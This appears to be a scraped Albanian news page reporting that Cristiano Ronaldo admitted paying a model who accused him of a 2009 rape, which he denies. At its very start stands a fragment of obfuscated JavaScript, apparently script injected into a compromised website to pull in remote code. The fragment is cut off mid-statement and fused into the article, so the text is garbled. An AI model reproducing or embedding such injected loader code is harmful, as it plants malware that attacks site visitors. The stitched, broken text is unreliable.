;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Cristiano Ronaldo e pranon, kaq para i dha modeles që e akuzoi për përdhunim

By

Njëri nga futbollistët më të mirë në botë, Cristiano Ronaldo, e ka pranuar publikisht se i ka dhënë 375 mijë dollarë një gruaje e cila ka deklaruar se ylli i futbollit e kishte përdhunuar në vitin 2009-të. Megjithatë siç raporton revista amerikane TMZ në edicionin e sportit, futbollisti i ka mohuar akuzat.

Modelja Kathryn Mayorga ka deklaruar se kishte marrë para nga Ronaldo në vitin 2009-të, si pjesë e një marrëveshjeje private dhe kishte thënë se kishte nënshkruar një marrëveshje konfidencialiteti ku ajo zotohej që do e mbante gojën të mbyllur për incidentin e ndodhur.

Por çfarë kishte ndodhur?

Mayorga ka raportuar se e kishte takuar Ronaldon në një klub nate në Palms Hotel në qershor të vitit 2009-të dhe kishte shkuar në një festë në shtëpinë e tij, ku ai edhe e kishte dhunuar.

Ajo e kishte paraqitur rastin edhe në polici, mirëpo s’e kishte dhënë emrin e Ronaldos, vetëm e kishte përshkruar si yll të madh futbolli.

Ndërsa akuzat e saj u bënë publike sërish në vitin 2018-të, megjithatë autoritetet kishin vendosur që të mos ngrinin aktakuzë për Ronaldon, meqë kishte mungesë provash e në anën tjetër, edhe CR7 i kishte mohuar akuzat.

Megjithatë sportisti nga të dhënat e gjykatës që ka siguruar TMZ, e ka pranuar se e kishte paguar modelen që të mos fliste për atë që kishte ndodhur. /Prive.al

 

Artikuj të ngjashëm